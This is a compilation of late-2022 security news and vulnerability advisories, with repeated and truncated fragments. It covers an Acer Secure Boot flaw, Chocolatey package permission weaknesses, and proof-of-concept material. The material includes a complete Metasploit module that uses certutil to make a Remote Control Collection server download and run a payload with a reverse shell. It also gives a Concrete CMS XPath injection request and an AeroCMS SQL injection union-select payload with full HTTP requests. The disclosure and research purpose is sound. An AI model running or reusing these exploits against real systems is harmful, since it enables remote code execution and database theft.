Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.

Tracked as **CVE-2022-4020**, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as an issue that "may allow changes to Secure Boot settings by creating NVRAM variables." Credited with discovering the flaw is ESET researcher Martin Smolár, who previously disclosed similar bugs in Lenovo computers.

Disabling Secure Boot, an integrity mechanism that guarantees that only trusted software is loaded during system startup, enables a malicious actor to tamper with boot loaders, leading to severe consequences.

This includes granting the attacker complete control over the operating system loading process as well as "disable or bypass protections to silently deploy their own payloads with the system privileges."

Per the Slovak cybersecurity company, the flaw resides in a DXE driver called HQSwSmiDxe.

The BIOS update is expected to be released as part of a critical Windows update. Alternatively, users can download the fixes from Acer's Support portal.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Flaw in Acer Laptops Could Let Attackers Disable Secure Boot Protection

Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.
Tracked as CVE-2022-4020, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as

Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.

Tracked as **CVE-2022-4020**, the high-severity vulnerability affects five different models that consist of Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G.

The PC maker described the vulnerability as an issue that "may allow changes to Secure Boot settings by creating NVRAM variables." Credited with discovering the flaw is ESET researcher Martin Smolár, who previously disclosed similar bugs in Lenovo computers.

Disabling Secure Boot, an integrity mechanism that guarantees that only trusted software is loaded during system startup, enables a malicious actor to tamper with boot loaders, leading to severe consequences.

This includes granting the attacker complete control over the operating system loading process as well as "disable or bypass protections to silently deploy their own payloads with the system privileges."

Per the Slovak cybersecurity company, the flaw resides in a DXE driver called HQSwSmiDxe.

The BIOS update is expected to be released as part of a critical Windows update. Alternatively, users can download the fixes from Acer's Support portal.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

This Metasploit module utilizes the Remote Control Server's protocol to deploy a payload and run it from the server. Remote Control Collection by Steppschuh version 3.1.1.12 was tested and affected at the time of the module writing.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Exploit::Remote::Udp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Remote Control Collection RCE',        'Description' => %q{          This module utilizes the Remote Control Server's, part          of the Remote Control Collection by Steppschuh, protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.1.1.12, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'H4rk3nz0' # edb, discovery        ],        'References' => [          [ 'URL', 'http://remote-control-collection.com' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp',          'WfsDelay' => 5,          'Autocheck' => false        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def special_key_header    "\x7f\x15\x02"  end  def key_header    "\x7f\x15\x01"  end  def windows_key    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up    udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down    sleep(datastore['SLEEP'])  end  def enter_key    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")    sleep(datastore['SLEEP'])  end  def send_command(command)    command.each_char do |c|      udp_sock.put("#{key_header}#{c}")      sleep(datastore['SLEEP'] / 10)    end    enter_key    sleep(datastore['SLEEP'])  end  def check    @check_run = true    @check_success = false    upload_file    return Exploit::CheckCode::Vulnerable if @check_success    return Exploit::CheckCode::Safe  end  def on_request_uri(cli, _req)    @check_success = true    if @check_run # send a random file      p = Rex::Text.rand_text_alphanumeric(rand(8..17))    else      p = generate_payload_exe    end    send_response(cli, p)    print_good("Request received, sending #{p.length} bytes")  end  def upload_file    connect_udp    # send a space character to skip any screensaver    udp_sock.put("#{key_header} ")    print_status('Connecting and Sending Windows key')    windows_key    print_status('Opening command prompt')    send_command('cmd.exe')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17))    filename << '.exe' unless @check_run    if @service_started.nil?      print_status('Starting up our web service...')      start_service('Path' => '/')      @service_started = true    end    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"    send_command(get_file)    if @check_run.nil? || @check_run == true      send_command("del #{path}#{filename} && exit")    else      register_file_for_cleanup("#{path}#{filename}")      print_status('Executing payload')      send_command("#{path}#{filename} && exit")    end    disconnect_udp  end  def exploit    @check_run = false    upload_file  endend

Remote Control Collection Remote Code Execution

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

The manufacturer is working to fix a vulnerability — similar to a previous problem in Lenovo laptops — that allows threat actors to modify or disable Secure Boot settings to load malware.

Acer is working to fix a firmware flaw affecting five of its laptop models. An exploit could allow attackers to disable a machine's Secure Boot settings to bypass key security measures and load malware, researchers have found.

ESET Research researcher Martin Smolar discovered the flaw, tracked as CVE-2022-4020, in the HQSwSmiDxe DXE driver on some versions of consumer Acer Aspire and Extensa notebooks. An attacker with elevated privileges can use the flaw to modify UEFI Secure Boot settings via an NVRAM variable, ESET disclosed in a series of tweets posted Nov. 28.

"#CVE-2022-4020 is found in the DXE driver HQSwSmiDxe, which checks for the 'BootOrderSecureBootDisable' NVRAM variable," according to ESET. "If the variable exists, the driver disables Secure Boot."

Secure Boot is a security feature of the Unified Extensible Firmware Interface (UEFI) 2.3.1 designed to detect tampering with boot loaders, OS files, and unauthorized option ROMs by validating their digital signatures. The feature blocks any malicious activity before it can infect the system.

By exploiting the flaw, threat actors can bypass this feature and run whatever code they want on the machine, malware or otherwise, even achieving persistence in a case in which an OS is reinstalled, the researchers said.

**Different Manufacturer, Similar Security Vulnerability**

Specifically, CVE-2020-4020 affects Acer Aspire A315-22, A115-21, and A315-22G, and Extensa EX215-21 and EX215-21G notebooks. The flaw creates a similar opportunity for attackers to the one caused by vulnerabilities tracked as CVE-2022-3430, CVE-2022-3431, and CVE-2022-3432 that ESET researchers found in early November in various Lenovo Yoga IdeaPad and ThinkBook devices, and subsequently detailed extensively in a series of tweets.

As in that case, ESET also reported the vulnerability to the computer manufacturer for remediation. Acer quickly responded on Nov. 29 with a security update corroborating Smolar's findings and stressing the serious nature of the flaw.

"By disabling the Secure Boot feature, an attacker can load their own unsigned malicious bootloader to allow absolute control over the OS loading process," the company said. "This can allow them to disable or bypass protections to silently deploy their own payloads with the system privileges."

Acer is working on a BIOS update to resolve the issue that it will post on the Acer Support site, and recommends that affected users update their BIOS, once available, to the latest version to resolve the problem. The patch also will be included as a critical Windows update, the company said.

**Common NVRAM Variable Problem**

In both the Lenovo and Acer scenarios, attackers can exploit the Acer bug by creating special NVRAM variables, the actual value of which is not important—the existence of the variable itself is the only thing an affected firmware driver checks, the researchers noted.

NVRAM variables define a name for the boot option that can be displayed to a user. The variable also contains a pointer to the hardware device and to a file on that hardware device that contains the UEFI image to be loaded.

This problem appears to be quite well known, with researchers already advising against firmware developers storing security-sensitive components in these variables. Firmware security engineer Nikolaj Schlej even tweeted a plea to firmware developers in October to "stop using common NVRAM as trusted storage" because of the security problem it poses.

"It is indeed really tempting to use NVRAM or CMOS SRAM for storing triggers for various things, but both need to be assumed being under full attacker control," he said in a response to his own tweet. "Even volatile NVRAM variables aren't completely safe because there is still a chance of incorrect attribute check."

In the case of the Lenovo flaws, it does appear that developers already were aware of the issue before it made its way into the company's laptops, as some of the affected components were only meant to be used during manufacturing and were mistakenly included in production, according to ESET.

Acer Firmware Flaw Lets Attackers Bypass Key Security Feature

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

Insecure permissions in Chocolatey Ruby package v3.1.2.1 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\ruby31 and all files located in that folder.

**Incorrect default permission of ruby if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install ruby in windows System.The default install dir of ruby is C:\\tools\\ruby31, howerver, the permission of C:\\tools\\ruby31 is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\ruby31 and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/ruby

Install Command : choco install ruby --version=3.1.2.1

Vuln Version: ruby 3.1.2.1 and below

**Vuln Analyse**

*   Use chocolatey to install ruby in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\ruby31 and files in it.

So an attacker with low privilege can hijack binary likeC:\\tools\\ruby31\\ruby.exe to execute arbitrary code when administrator or other users use ruby installed by chocolatey.

CVE-2022-45301: Vuln/ruby-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey PHP package v8.1.12 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\tools\php81 and all files located in that folder.

**Incorrect default permission of php if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install php in windows System.The default install dir of php is C:\\tools\\php81, howerver, the permission of C:\\tools\\php81 is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\php81 and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/php

Install Command : choco install php --version=8.1.12

Vuln Version: php 8.1.12 and below

**Vuln Analyse**

*   Use chocolatey to install php in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\php81 and files in it.

So an attacker with low privilege can hijack binary like C:\\tools\\php81\\php.exe to execute arbitrary code when administrator or other users use php installed by chocolatey.

CVE-2022-45307: Vuln/php-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Cmder package v1.3.20 and below grants all users in the Authenticated Users group write privileges for the path C:\tools\Cmder and all files located in that folder.

**Incorrect default permission of Cmder if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install cmder in windows System.The default install dir of cmder is C:\\tools\\Cmder, howerver, the permission of C:\\tools\\Cmder is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\Cmder and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/cmder

Install Command : choco install cmder --version=1.3.20

Vuln Version: cmder 1.3.20 and below

**Vuln Analyse**

*   Use chocolatey to install Cmder in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\Cmder and files in it.

So an attacker with low privilege can hijack binary likeC:\\tools\\Cmder\\Cmder.exe to execute arbitrary code when administrator or other users use cmder installed by chocolatey.

CVE-2022-45304: Vuln/cmder-weak-permission-vuln.md at main · ycdxsb/Vuln

Insecure permissions in Chocolatey Azure-Pipelines-Agent package v2.211.1 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\agent and all files located in that folder.

**Incorrect default permission of Azure-piplines-agent if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install azure-pipelines-agent in windows System.The default install dir of azure-pipelines-agent is C:\\agent howerver, the permission of C:\\agent is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\agent and files in it.

Vuln Type: CWE-276

Website:https://community.chocolatey.org/packages/azure-pipelines-agent

Install Command : choco install azure-pipelines-agent --version=2.211.1

Vuln Version: azure-pipelines-agent version 2.211.1 and below

**Vuln Analyse**

*   Use chocolatey to install azure-pipelines-agent in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\agent and files in it.

So an attacker with low privilege can hijack binary like C:\\agent\\bin\\AgentService.exe to execute arbitrary code when administrator or other users use azure-pipelines-agent installed by chocolatey.

Tag

#windows